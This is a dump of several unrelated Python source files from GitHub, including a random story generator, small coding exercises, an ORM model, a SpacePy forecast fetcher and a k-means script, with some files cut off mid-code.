narrative-------\"])\n\t\t\tbreak\n\t\tstory.blankLine()\n\t\n\tstory.state([\"---------- Epilogue:\"])\n\t\n\tfor each in story.people:\n\t\teach.feel()\n\ndef developnarrative(people): #ary\n\tunsettled=False\n\tfor person in people:\n\t\tif person.feelingNo!=0 and person.feelingNo>=-12: #if a person is normal and not (emotionally) dead\n#\t\t\tstory.state([str(person.feelingNo),\"should be not zero and higher than -13\"])\n\t\t\tfor otherPerson in people:\n\t\t\t\t### possible addition to below: person.feelingNo!=0\n\t\t\t\tif otherPerson.feelingNo>=-12 and person!=otherPerson:## i.e. if person is alive and not me\n#\t\t\t\t\tstory.state([\"otherPersonFeels\",str(otherPerson.feelingNo<-12)])\n\t\t\t\t\tperson.actOn(otherPerson)\n\t\t\t\t\totherPerson.feel()\n\t\t\t\t\tbreak # I've made somebody feel... no need to make the whole world go bonkers!\n\t\t\tunsettled=True\n\treturn unsettled\n\n######################### Global Variables: ##############################\n\nhumanNaturalPowers=[\n#[\"saved\",+5],\n#[\"inspired\",+4],\n##[\"listened to\",+3],\n#[\"read a narrative to\",+3],\n#[\"complemented\",+2],\n#[\"sympathised with\",+2],\n##[\"played a game with\",+2],\n[\"greeted\",+1],\n[\"surprised\",+1],\n[\"smiled at\",+1],\n[\"wished well\",+1],\n[\"waved to\",+1],\n[\"looked at\",+1],\n[\"looked past\",-1],\n[\"turned away from\",-1],\n[\"ignored\",-1],\n[\"said goodbye to\",-1],\n[\"scared\",-1],\n[\"frowned at\",-1],\n#[\"didn't sympathise with\",-2],\n#[\"insulted\",-2],\n#[\"shouted at\",-3],\n#[\"stood on\",-4],\n#[\"captured\",-5]\n##[\"murdered\",-100], ## DISABLED... Causing too many killings!\n]\n#[\"\",],\n\n#\t\tself.title=oneOf([\"builder\",\"assasin\",\"juggler\",\"programmer\",\"musician\",\"tailor\",\"seamstress\",\"cook\",\"salesman\"])\nprofessions=[\n[ \"assasin\",[[\"shot at\",-6],[\"shot\",-100],[\"threatened\",-4],[\"aimed at\",0],[\"fell in love with\",+12]] ],\n[ \"cook\",[[\"baked a cake for\",+3],[\"made a tea for\",+1],[\"made a coffee for\",+2],[\"made dinner for\",+2]] ],\n[ \"fairy\",[[\"blessed\",+3],[\"gave fairy dust to\",+6],[\"appeared to\",+1],[\"cursed\",-4]] ],\n[ \"woodcutter\",[[\"grunted at\",+1],[\"burped at\",-2],[\"threw an axe at\",-2],[\"tried to chop\",-4],[\"gave a tree to\",+2]] ],\n[ \"loner\",[[\"cried to\",-3],[\"gave a flower to\",+4],[\"stole from\",-3],[\"slept near\",-3],[\"begged\",-1],[\"played music to\",+1]] ],\n#[ \"\",[[\"\",+],[\"\",+],[\"\",+],[\"\",+],[\"\",+],[\"\",+],[\"\",+],[\"\",+],[\"\",+]]],\n#[ \"builder\",[[\"\",+],[\"\",+],[\"\",+],[\"\",+],[\"\",+],[\"\",+],[\"\",+],[\"\",+],[\"\",+]] ],\n[ \"orphan\",[[\"asked paternal advice from\",-2],[\"glared at\",-2],[\"hugged\",+4],[\"felt for\",0]] ]\n]\n\n################################### Classes ############################################\n\nclass narrative:\n\tdef __init__(self): # (self,name)\n\t\tself.title=\"A story of Woe\"\n\t\tself.lines = []\n\t\tself.people= []\n\tdef addPeople(self,ary):\n#\t\tfor each in ary:\n\t\tself.people.extend(ary)\n#\t\t\teach=person() #declare them in here??\n\tdef addPeople2(self,number=1):\n\t\tfor each in range(0,number):\n\t\t\tnewPerson=person()\n\t\t\tself.people.append(newPerson)\n\tdef describePeople(self):\n\t\tfor person in self.people:\n\t\t\tperson.describe()\n\tdef state(self,ary):\n\t\tstring=ary[0].capitalize()\n\t\tfor word in ary[1:]:\n\t\t\tif word != \"\":\n\t\t\t\tstring+=\" \" + word\n\t\tstring+=\". \\n\"\n\t\tself.lines.append(string)\n\tdef recount(self):\n\t\tprint(self.title + \"\\n---\")\n\t\tprint(\"\".join(self.lines))\n\tdef blankLine(self):\n\t\tself.lines.append(\"\\n\")\n\n#\t\tself.title=oneOf([\"builder\",\"assasin\",\"juggler\",\"programmer\",\"musician\",\"tailor\",\"seamstress\",\"cook\",\"salesman\"])\nclass profession: # template:Assassin\n\tdef __init__(self): # (self,name)\n\t\tjob=oneOf(professions)\n\t\tself.title=job[0]\n#\t\tprint(self.title)\n\t\tself.description=\"unfinished\"\n\t\tself.powers=job[1] # articial verbs/abilities\n#\t\tprint(self.powers)\n\t\tself.feelingNo=0\n\tdef describe(self):\n#\t\tprint \"aoranisReturning>\"+aOrAn(self.title)\n\t\tstory.state([self.title,self.description])\n\nclass person:\n\tdef __init__(self): # (self,name)\n\t\tself.name=getName()\n\t\tself.powers=humanNaturalPowers # natural verbs/abilities\n\t\tself.job=profession()\n#\t\tself.powers.extend(self.job.powers) # TEMPORARY: DISABLED JOBS\n\t\tself.title=self.job.title\n\t\tself.feelingNo=0\n\t\t\n\tdef describe(self):\n#\t\tprint \"aoranisReturning>\"+aOrAn(self.title)\n\t\tstory.state([self.name,\"was\",aOrAn([self.title])])\n\tdef actOn(self,other):\n\t\taction = oneOf(list(self.powers))\n\t\tstory.state([self.name,action[0],other.name])\n\t\tother.feelingNo += action[1]\n\tdef feel(self):\n\t\t### feelings for others are negative. feelings for self are positive\n#\t\tstory.state([str(self.feelingNo)])\n\t\tif self.feelingNo>24:\n\t\t\tfeelings=\"dead from self\"\n\t\tif self.feelingNo>12:\n\t\t\tfeelings=\"blinded by selfishness\"\n\t\telif self.feelingNo>8:\n\t\t\tfeelings=\"very selfish\"\n\t\telif self.feelingNo>6:\n\t\t\tfeelings=\"selfish\"\n\t\telif self.feelingNo>2:\n\t\t\tfeelings=\"self-centered\"\n\t\telif self.feelingNo>0:\n\t\t\tfeelings=\"self-aware\"\n\t\telif self.feelingNo==0:\n\t\t\tfeelings=\"good\"\n\t\telif self.feelingNo>-2:\n\t\t\tfeelings=\"small\"\n\t\telif self.feelingNo>-2:\n\t\t\tfeelings=\"very small\"\n\t\telif self.feelingNo>-6:\n\t\t\tfeelings=\"tiny\"\n\t\telif self.feelingNo>-8:\n\t\t\tfeelings=\"streteched\"\n\t\telif self.feelingNo>-12:\n\t\t\tfeelings=\"crushed\"\n\t\telif self.feelingNo>-24:\n\t\t\tfeelings=\"absolutely crushed\"\n\t\telse:\n\t\t\tfeelings=\"dead from others\"\n\t\tstory.state([self.name,\"felt\",feelings])\n\n########################### other functions #################################\n\n\n\n\n################ grammar and spelling related functions ########### \n\ndef aOrAn(words): # still need to fix spaces problem\n#\tprint(words)\n\tfor word in words:\n\t\tif word==\"\":\n\t\t\tcontinue\n\t\telif word[0].lower() in [\"a\",\"e\",\"i\",\"o\",\"u\"]:\n\t\t\treturn \"an \" + \" \".join(words)\n\t\telse:\n\t\t\treturn \"a \" + \" \".join(words)\n\nnames=[\"Jim\",\"Karl\",\"Pharaoah\",\"Queenie\",\"Marty\",\"Doctor Brown\",\"Empressette\",\"Proffessor Plum\",\"Wifty\",\"Beefy\",\"Bobert\",\"Maxwell\",\"Denvod\",\"Clix\",\"Amias the Third\",\"Bobiatas\"]\ndef getName(): # fairly ### doesn't work if you use everybody!\n#\tforenames=[\"Jon\",\"Jim\",\"Karl\"] ### add this functionality later\n\tglobal names\n\trandomNameNo = oneIn(len(names))\n\trandomName = names[randomNameNo]\n\tdel names[randomNameNo] #removing element from list so we don't get repeats in the narrative\n\treturn randomName\n\n################ randomisers ###############################\n\nseeds = [] # string based randomiser setup\nlastSeed = -1\n\ndef promptForSeed():\n\n\tprint(\"Please input your chosen narrative number randomiser\")\n\tseedStr = raw_input(\"> \") # this is a random sit on the keyboard string\n\tglobal seeds\n\tglobal lastSeed\n\n#\t#failsafe\n\tif seedStr == \"\":\n\t seedStr = \"sjonwmuzla[423534634576\"\n\n\t#prepare randomiser\n\tfor char in seedStr:\n\t\tseeds.append(ord(char))\n\ndef aSeed():\n\tglobal seeds\n\tglobal lastSeed\n\tlastSeed += 1\n\tif lastSeed >= len(seeds):\n\t\tlastSeed = 0\n\tseeds[lastSeed]+=59\n\treturn seeds[lastSeed]\n\ndef oneOf(ary,prob=1): # uses aSeed, and returns a no\n\tif aSeed()%prob == 0:\n\t\treturn ary[aSeed()%(len(ary)-1)]\n\telse:\n\t\treturn \"\"\n\ndef oneIn(max):\n\treturn ((aSeed()+aSeed()+aSeed()+aSeed()+aSeed())%max) # 400-800?\n\n### run main\n\nstory = narrative()\n\nmain()\n\n######################### old functions ########################################\n'''\n\n'''\n\n\n","repo_name":"joegrimer/joegrimer.github.io","sub_path":"wordy/Story Generator/Revision0/storyGen4.py","file_name":"storyGen4.py","file_ext":"py","file_size_in_byte":8109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10927868151","text":"#-*- coding: UTF-8 -*-\nimport functools\n\nclass Solution(object):\n def largestNumber(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: str\n \"\"\"\n nums = [str(i) for i in nums]\n comp = lambda a,b : 1 if a+b>b+a else -1 if a+b 0:\n return data\n else:\n return []\n\n def get_FormValues_byForm_and_Field_and_Value(self, id_form,field,value):\n if isinstance(value, list):\n data = self.store.find(ModelsFormValues, ModelsFormValues.fields==field,\n ModelsFormValues.value.is_in(value)) #.one()\n\n else:\n data = self.store.find(ModelsFormValues, ModelsFormValues.fields==field,\n ModelsFormValues.value==value) #.one()\n\n if id_form != 0:\n data = data.find(forms_id=id_form)\n\n \n return data\n\n\n\n def get_FormValues_byForm_and_Instance(self, id_form, id_instance):\n data = self.store.find(ModelsFormValues, ModelsFormValues.forms_id==id_form,\n ModelsFormValues.instance_id==id_instance)\n if data.count()>0:\n return data\n else:\n return []\n\n def get_FormValues_byForm(self, id_form):\n data = self.store.find(ModelsFormValues, ModelsFormValues.forms_id==id_form)\n if data.count()>0:\n return data\n else:\n return []\n #retorna todas as mudanças que teve no valor de um field\n def get_logField(self,):\n data = ModelsFormValues().store.find(ModelsLog, ModelsLog.forms_id==self.forms_id,\n ModelsLog.instance_id==self.instance_id,\n ModelsLog.fields==self.fields).order_by(ModelsLog.date_creation)\n return data\n","repo_name":"vindula/vindula.contentcore","sub_path":"vindula/contentcore/models/form_values.py","file_name":"form_values.py","file_ext":"py","file_size_in_byte":6189,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"5780641985","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 18 23:00:20 2020.\n\n@author: Martin\n\"\"\"\n\nimport csv\nfrom collections import Counter\n\n#%%\ndef leer_parque(archivo, parque):\n \"\"\"Lee el archivo y devuelve los arboles del parque.\"\"\"\n rta = []\n with open(archivo, \"r\", encoding = \"utf8\") as arboles:\n rows = csv.reader(arboles)\n headers = next(rows)\n for row in rows:\n if row[10] == parque:\n pos = dict(zip(headers,row))\n rta.append(pos)\n return rta\n\n#%%\ndef especies(lista_arboles):\n rta = []\n for row in lista_arboles:\n rta.append(row[\"nombre_com\"])\n rta = set(rta) \n return rta\n\n#%%\ndef contar_ejemplares(lista_arboles):\n contador = Counter()\n for row in lista_arboles:\n contador[row[\"nombre_com\"]] += 1\n return contador\n#%%\narbolParque1 = leer_parque(\"arbolado-en-espacios-verdes.csv\", \"GENERAL PAZ\")\narbolParque2 = leer_parque(\"arbolado-en-espacios-verdes.csv\", \"ANDES, LOS\")\narbolParque3 = leer_parque(\"arbolado-en-espacios-verdes.csv\", \"CENTENARIO\")\n\ncomunes1 = contar_ejemplares(arbolParque1).most_common(5)\ncomunes2 = contar_ejemplares(arbolParque2).most_common(5)\ncomunes3 = contar_ejemplares(arbolParque3).most_common(5)\n\n#%%\ndef obtener_altura(lista_arboles, especie):\n rta = []\n for row in lista_arboles:\n if row[\"nombre_com\"] == especie:\n rta.append(float(row[\"altura_tot\"]))\n return rta\n\n\n#%%\nalt1 = obtener_altura(arbolParque1, \"Jacarandá\")\nalt2 = obtener_altura(arbolParque2, \"Jacarandá\")\nalt3 = obtener_altura(arbolParque3, \"Jacarandá\")\n\nmax1 = max(alt1)\nmax2 = max(alt2)\nmax3 = max(alt3)\nprom1 = sum(alt1)/len(alt1)\nprom2 = sum(alt2)/len(alt2)\nprom3 = sum(alt3)/len(alt3)\n\n#%%\ndef obtener_inclinaciones(lista_arboles, especie):\n rta = []\n for row in lista_arboles:\n if row[\"nombre_com\"] == especie:\n rta.append(float(row[\"inclinacio\"]))\n return rta\n\n#%%\ndef especimen_mas_inclinado(lista_arboles):\n rta = [\"\",0]\n esps = especies(lista_arboles)\n for esp in esps:\n maxIncl = max(obtener_inclinaciones(lista_arboles, esp))\n if rta[1] < maxIncl:\n rta[0] = esp\n rta[1] = maxIncl\n return rta\n#%%\nmaxIncl1 = especimen_mas_inclinado(arbolParque1)\nmaxIncl2 = especimen_mas_inclinado(arbolParque2)\nmaxIncl3 = especimen_mas_inclinado(arbolParque3)\n\n#%%\ndef especie_promedio_mas_inclinada(lista_arboles):\n rta = [\"\",0]\n esps = especies(lista_arboles)\n for esp in esps:\n promIncl = sum(obtener_inclinaciones(lista_arboles, esp))/len(obtener_inclinaciones(lista_arboles, esp))\n if rta[1] < promIncl:\n rta[0] = esp\n rta[1] = promIncl\n return rta\n\npromMax = especie_promedio_mas_inclinada(arbolParque2)\n\n\n\n\n\n\n\n\n\n","repo_name":"ccollado7/UNSAM---Python","sub_path":"Revision de Pares/Semana N°2/Caso 1/02-2-tin-arboles.py-mar-2020-08-19_13.29.32.py","file_name":"02-2-tin-arboles.py-mar-2020-08-19_13.29.32.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1923685021","text":"__contact__ = 'Josef Koller, jkoller@lanl.gov'\n\nimport datetime\ntry:\n import urllib2 as u\nexcept ImportError:\n import urllib.request as u\n\nimport spacepy.datamodel as dm\nimport dateutil.parser as dup\n\n\n\n# -------------------------------------\ndef now():\n \"\"\"\n Return the current values for the parameters\n\n Returns\n -------\n out : datamodel.SpaceData\n A SpaceData containing the current values of the indices\n \"\"\"\n raise(NotImplementedError('Not yet implemented (nudge nudge)'))\n\n\n# -------------------------------------\t\ndef nextForecast():\n \"\"\"\n Return only the next value\n \n Returns\n -------\n out : datamodel.SpaceData\n A SpaceData containing the next forcast for the indices\n \"\"\"\n dd = forecast()\n data = dm.SpaceData()\n data.attrs = dd.attrs\n data['forecast_hours'] = [1,3]\n data['AE'] = [dd['AE_1hr'][-1], dd['AE_3hr'][-1]]\n data['Kp'] = [dd['Kp_1hr'][-1], dd['Kp_3hr'][-1]]\n data['Dst'] = [dd['Dst_1hr'][-1], dd['Dst_3hr'][-1]]\n data['Calc'] = [dd['Calc_1hr'][-1], dd['Calc_3hr'][-1]]\n data['Epoch'] = [dd['Epoch_1hr'][-1], dd['Epoch_3hr'][-1]]\n return data\n\n\ndef _parseRICE(data, hours):\n \"\"\"\n parse the data read form the Rice website\n \n .. warning: This is an internal function do not call directly\n\n Parameters\n ----------\n data : list\n data from the Rice website\n hours : str\n the forecast hours, used int h dict keys\n \n Returns\n -------\n out : datamodel.SpaceData\n datemnodel object of the parsed data\n \n \"\"\"\n dd = dm.SpaceData()\n # strip the newlines\n data = [val.rstrip() for val in data]\n header = data.pop(0) # grab the header\n header = header.split()[4:]\n units = []\n for i, val in enumerate(header):\n if '(' in val:\n val = val.split('(')\n units.append(val[-1].split(')')[0])\n header[i] = val[0]\n else:\n units.append(None)\n data = dm.dmarray([val.split() for val in data])\n times = dm.dmarray([dup.parse('{0}{1:02d}{2:02d}T{3:04d}'.format(val[0], int(val[1]), int(val[2]), int(val[3]))) for val in data[:, 0:4]])\n data = dm.dmarray(data[:,4:], dtype=float)\n for i, (key, unit) in enumerate(zip(header, units)):\n dd[key+'_' + hours + 'hr'] = dm.dmarray(data[:,i], attrs={'units':unit})\n dd['Calc_' + hours + 'hr'] = times\n dd['Epoch_' + hours + 'hr'] = dd['Calc_' + hours + 'hr'] + datetime.timedelta(hours=int(hours))\n return dd\n\n\ndef forecast():\n RICE_URL_1_last = 'http://mms.rice.edu/realtime/Predictions_1.last'\n RICE_URL_3_last = 'http://mms.rice.edu/realtime/Predictions_3.last'\n RICE_Boyle_all = 'http://mms.rice.edu/realtime/File1.txt'\n RICE_1hr_Kp_Dst = 'http://mms.rice.edu/realtime/File2.txt'\n RICE_3hr_Kp_Dst = 'http://mms.rice.edu/realtime/File3.txt'\n\n # grab all the 1 hour data\n hr1 = u.urlopen(RICE_1hr_Kp_Dst)\n data = hr1.readlines()\n hr1.close()\n dd1 = _parseRICE(data, '1')\n\n # grab all the 3 hour data\n hr3 = u.urlopen(RICE_3hr_Kp_Dst)\n data = hr3.readlines()\n hr3.close()\n dd3 = _parseRICE(data, '3')\n\n dd = dm.SpaceData()\n dd.attrs['URL_1hr'] = RICE_1hr_Kp_Dst\n dd.attrs['URL_3hr'] = RICE_3hr_Kp_Dst\n dd.attrs['retrive_time'] = datetime.datetime.now()\n \n for key1, key3 in zip(dd1, dd3):\n dd[key1] = dd1[key1]\n dd[key3] = dd3[key3]\n \n return dd\n \n\n\n","repo_name":"spacepy/spacepy","sub_path":"spacepy/realtime.py","file_name":"realtime.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","stars":213,"dataset":"github-code","pt":"54"} +{"seq_id":"70455429921","text":"###\n# Distinct primes factors\n# Problem 47\n#\n# The first two consecutive numbers to have two distinct prime factors are:\n#\n# 14 = 2 × 7\n# 15 = 3 × 5\n#\n# The first three consecutive numbers to have three distinct prime factors are:\n#\n# 644 = 2² × 7 × 23\n# 645 = 3 × 5 × 43\n# 646 = 2 × 17 × 19.\n#\n# Find the first four consecutive integers to have four distinct prime factors each. What is the first of these numbers?\n###\n\n\nimport itertools\n\n\n# from: https://en.wikipedia.org/wiki/Trial_division\ndef count_prime_factors(num):\n factors = []\n if num % 2 == 0:\n factors.append(2)\n while num % 2 == 0:\n num //= 2\n f = 3\n while f * f <= num:\n if num % f == 0:\n if not f in factors:\n factors.append(f)\n num //= f\n else:\n f += 2\n if num != 1:\n factors.append(num)\n return len(factors)\n\n\nfor n in itertools.count(1):\n if (count_prime_factors(n) == 4 and\n count_prime_factors(n + 1) == 4 and\n count_prime_factors(n + 2) == 4 and\n count_prime_factors(n + 3) == 4):\n print(n)\n break\n","repo_name":"cacharle/project_euler","sub_path":"python/047-distinct_primes_factors.py","file_name":"047-distinct_primes_factors.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"23571086105","text":"import json\nfrom typing import Any, Mapping, Protocol\n\nfrom muutils.json_serialize import json_serialize\n\n# takes message, level, other data, and outputs message with appropriate header\n# HeaderFunction = Callable[[str, int, Any], str]\n\n\nclass HeaderFunction(Protocol):\n def __call__(self, msg: Any, lvl: int, **kwargs) -> str:\n ...\n\n\ndef md_header_function(\n msg: Any,\n lvl: int,\n stream: str | None = None,\n indent_lvl: str = \" \",\n extra_indent: str = \"\",\n **kwargs,\n) -> str:\n \"\"\"standard header function. will output\n\n - `# {msg}`\n\n for levels in [0, 9]\n\n - `## {msg}`\n\n for levels in [10, 19], and so on\n\n - `[{stream}] # {msg}`\n\n for a non-`None` stream, with level headers as before\n\n - `!WARNING! [{stream}] {msg}`\n\n for level in [-9, -1]\n\n - `!!WARNING!! [{stream}] {msg}`\n\n for level in [-19, -10] and so on\n\n \"\"\"\n stream_prefix: str = \"\"\n if stream is not None:\n stream_prefix = f\"[{stream}] \"\n\n lvl_div_10: int = lvl // 10\n\n msg_processed: str\n if isinstance(msg, Mapping):\n msg_processed = \", \".join([f\"{k}: {json_serialize(v)}\" for k, v in msg.items()])\n else:\n msg_processed = json.dumps(json_serialize(msg))\n\n if lvl >= 0:\n return f\"{extra_indent}{indent_lvl * (lvl_div_10 - 1)}{stream_prefix}#{'#' * lvl_div_10 if lvl else ''} {msg_processed}\"\n else:\n exclamation_pts: str = \"!\" * (abs(lvl) // 10)\n return f\"{extra_indent}{exclamation_pts}WARNING{exclamation_pts} {stream_prefix} {msg_processed}\"\n\n\nHEADER_FUNCTIONS: dict[str, HeaderFunction] = {\n \"md\": md_header_function,\n}\n","repo_name":"mivanit/muutils","sub_path":"muutils/logger/headerfuncs.py","file_name":"headerfuncs.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"23005637348","text":"Dataset = {\n \"listA\": [{\n \"name\": \"John\",\n \"age\": 20,\n \"dateJoined\": \"2020-01-01\",\n }, {\n \"name\": \"John\",\n \"age\": 25,\n \"dateJoined\": \"2020-01-01\",\n }, {\n \"name\": \"John\",\n \"age\": 30,\n \"dateJoined\": \"2020-01-01\",\n }, {\n \"name\": \"Alice\",\n \"age\": 35,\n \"dateJoined\": \"2020-01-01\",\n }, {\n \"name\": \"Joe\",\n \"age\": 40,\n \"dateJoined\": \"2020-09-25\",\n }],\n \"listB\": [{\n \"name\": \"Kate\",\n \"age\": 20,\n \"dateJoined\": \"2020-01-01\",\n }, {\n \"name\": \"Lisa\",\n \"age\": 21,\n \"dateJoined\": \"2019-12-23\",\n }, {\n \"name\": \"mike\",\n \"age\": 30,\n \"dateJoined\": \"2020-04-26\",\n }, {\n \"name\": \"nancy\",\n \"age\": 35,\n \"dateJoined\": \"2020-08-20\",\n }, {\n \"name\": \"peter\",\n \"age\": 40,\n \"dateJoined\": \"2020-03-25\",\n }\n]\n}\n\n# test User data, used to test the sorting algorithm\n\ndef quickSort(arr, left, right, parameter):\n # implementation of the quick sort algorithm based on the parameter \n def partition(arr, left, right, pivot):\n while left <= right:\n while arr[left][parameter] < pivot[parameter]:\n left +=1\n while arr[right][parameter] > pivot[parameter]:\n right -=1\n if left <= right:\n # swap the values on the right and left of the pivot point\n temp = arr[left]\n arr[left] = arr[right]\n arr[right] = temp\n # go into the list from both ends after swapping\n left += 1\n right -=1\n return left\n if left >= right:\n return \n # pivot point is always selected from the midpoint\n pivot = arr[int((left + right)/2)]\n index = partition(arr, left, right, pivot)\n \n quickSort(arr, left, index - 1, parameter)\n quickSort(arr, index, right, parameter)\n\n\n\n\n\ndef mergeSort(listA, listB):\n # perform a quick sort on the merged list\n mergedList = listA + listB\n quickSort(arr=mergedList, left=0, right=len(mergedList) - 1, parameter=\"dateJoined\")\n dates = []\n\n for i in mergedList:\n # store all the dateJoined values of all users in the data array\n print(i)\n dates.append(i[\"dateJoined\"])\n\n\n def getRepeatedValues(list):\n # this function checks for repeated value\n repeated_values = {}\n count = 1\n for i in range(len(list)):\n if i < count:\n # skip indexes if they are the same\n continue\n index_dates= [i]\n index_names = [mergedList[i][\"name\"]]\n for j in range(i+1, len(list)):\n if list[i] == list[j]:\n # compare the first element in the list to the next element \n # if equal increase count\n count +=1\n index_dates.append(j)\n index_names.append(mergedList[j][\"name\"])\n repeated_values.update({list[i]: (index_dates, index_names)})\n if j >= len(list) - 1:\n # end function of j is at the end of the loop\n return repeated_values\n else:\n # break if next element is not equal\n break\n\n print(repeated_values)\n return repeated_values\n \n # get all indexes of users with the same dateJoined\n repeated_dates = getRepeatedValues(dates).items()\n for key , value in repeated_dates:\n # sort the list based on names using the quick sort if dates are repeated\n quickSort(mergedList, value[0][0], value[0][len(value[0])-1], \"name\")\n names = [i for i in value[1]]\n # get all the names of users with the same dateJoined\n repeated_names = getRepeatedValues(names).items()\n for key2, value2 in repeated_names:\n # sort the list based on ages using the quick sort if names are repeated\n quickSort(mergedList, value2[0][0], value2[0][len(value2[0])-1], \"age\")\n\n\n print(\"\\n\\n\")\n for i in mergedList:\n print(i)\n\nmergeSort(Dataset[\"listA\"], Dataset[\"listB\"])\n","repo_name":"SydneyTechnologies/TechUnicornAssessment","sub_path":"practical3to7.py","file_name":"practical3to7.py","file_ext":"py","file_size_in_byte":4048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37772916901","text":"# import __main__ as main\n# from Helper.TimerLogger import CodeTimeLogging\n# fileName = main.__file__\n# fileName = fileName.split('\\\\')[-1]\n\n# CodeTimeLogging(Flag='F', filename=fileName, Tag='Tree', Difficult='Medium')\n\n\nfrom Datastruct.masterTree import readyTree\n\n\ndef hasPathSum(tree):\n ans = []\n root = tree.getHead()\n\n getPathSum(root, ans, 0)\n return ans\n\n\ndef getPathSum(node, ans, currSum):\n if not node:\n return\n\n currSum += node.data\n\n if node.lChild is None and node.rChild is None:\n ans.append(currSum)\n\n getPathSum(node.lChild, ans, currSum)\n getPathSum(node.rChild, ans, currSum)\n\n\nreadyTree.printTree()\nprint(hasPathSum(readyTree))\n","repo_name":"Omkar02/FAANG","sub_path":"LC_112_PathSum.py","file_name":"LC_112_PathSum.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"8615872275","text":"# my code\n\nfrom fractions import Fraction\n\nn = int(input())\nr = list(map(int, input().split()))\n\nfor i in range(1 , n):\n sol = Fraction(r[0] , r[i])\n print(f\"{sol.numerator}/{sol.denominator}\")\n","repo_name":"inni-iii/Algorithm","sub_path":"coding with python/baekjoon/3036.py","file_name":"3036.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"201880514","text":"from numpy import *\nimport matplotlib\nimport matplotlib.pyplot as plt\ndef LoadDataSet(filename):\n fr = open(filename)\n DataMat = []\n for line in fr.readlines():\n Data = line.strip().split('\\t')\n line = list(map(float, Data)) #可迭代对象的批操作\n DataMat.append(line)\n print(DataMat)\n return DataMat\n\ndef distOhm(vectA, vectB): #返回向量间的欧氏距离\n return sqrt(sum(power(vectA - vectB, 2)))\n\ndef RandCenter(DataSet, k): #生成k个数据域中的随机点作为中心点\n n = shape(DataSet)[1]\n RandCent = mat(zeros((k, n), dtype=float))\n for i in range(n):\n Min = min(DataSet[:, i])\n print(Min)\n Range = float(max(DataSet[:, i]) - Min)\n RandCent[:,i] = Min + Range*random.rand(k, 1)\n return RandCent\n\ndef kMeans(DataSet, k, DistMeas = distOhm, CreateCent = RandCenter):\n m = shape(DataSet)[0] #获取数据个数\n ClusterState = mat(zeros((m, 2))) #用来储存每一个数据点的信息\n CenterMat = CreateCent(DataSet, k)\n ClusterChanging = True\n counter = 1\n while ClusterChanging:\n ClusterChanging = False\n for i in range(m): #对每一个数据点求最小距离和索引\n MinDist = inf\n MinIndex = -1\n for j in range(k):\n DistI = DistMeas(CenterMat[j], DataSet[i])\n if DistI < MinDist:\n MinDist = DistI\n MinIndex = j\n if ClusterState[i,0] != MinIndex: #如果任意一个数据的最近中心的簇号有更新就进入下一轮\n ClusterChanging = True\n ClusterState[i] = MinIndex, MinDist\n print(CenterMat)\n for center in range(k):\n DataSelect = DataSet[nonzero(ClusterState[:,0].A == center)[0]] #.A变成array格式,返回m*1的array,nonzero返回按行列的列表*2,选按行的[0]\n CenterMat[center, :] = mean(DataSelect, axis=0)\n Plot(counter, ClusterState, CenterMat, DataMat)\n counter+=1\n plt.show()\n return CenterMat, ClusterState\n\ndef Plot(counter, ClusterState, CenterMat, DataMat):\n color = [\"red\", \"purple\", \"green\", \"orange\"]\n shape = [\"+\", \"+\", \"+\", \"+\"]\n Position = [\"231\", \"232\", \"233\", \"234\", \"235\", \"236\"]\n plt.suptitle(\"The process of clustering\")\n ax1 = plt.subplot(Position[counter-1])\n plt.title(str(counter))\n for i in range(4):\n Data = DataMat[nonzero(ClusterState[:, 0].A == i)[0]]\n ax1.scatter(Data[:, 0].A.flatten(), Data[:, 1].A.flatten(), color=color[i], alpha=0.6)\n ax1.scatter(CenterMat[i, 0], CenterMat[i, 1], marker=shape[i], color = color[i], s = 80)\n\nif __name__ == \"__main__\":\n DataMat = mat(LoadDataSet(\"testSet.txt\"))\n CenterMat, ClusterState = kMeans(DataMat, 4)\n\n","repo_name":"JaireYu/Machine-Learning","sub_path":"Clustering_Learning/k-means.py","file_name":"k-means.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39113631730","text":"print('THE INPUTO :D')\n\nlist = []\nprint('Please choose to insert, delete, update or list')\nprint('this is to make a list\\n')\n\nconti='y'\nwhile conti == 'y' :\n insertcomand=input('What to do?')\n if insertcomand.lower() == 'insert':\n data= input('Insert your data here :')\n list.append(data)\n print(list)\n elif insertcomand.lower() == 'delete':\n list.pop()\n print(list)\n elif insertcomand.lower() == 'update':\n print(list)\n data = int(input('which one got updated (in number start with 0):'))\n updated = input('what need to be change :')\n list[data] = updated\n print(list)\n elif insertcomand.lower() == 'list':\n print(list)\n else :\n print('Error, please try again !!')\n conti = input('Do you wish to continue (y/n) ?')\nprint('Thank you for using inputo :D')\n","repo_name":"Frendy222/Frendysusanto_ITP_excersiceweek2","sub_path":"inputo.py","file_name":"inputo.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12923178341","text":"import numpy as np\nimport math\n\ndef set_source(elements,strike,dip,rake,length,width,sx,sy,sz,nl=1,nw=1):\n source_list = []\n strike_rad = np.deg2rad(strike)\n dip_rad = np.deg2rad(dip)\n\n ln = np.linspace(-length/2,length/2,nl+1)\n wn = np.linspace(-width/2,width/2,nw+1)\n\n l = np.convolve(ln,[0.5,0.5],\"valid\")\n w = np.convolve(wn,[0.5,0.5],\"valid\")\n dl = length/nl\n dw = 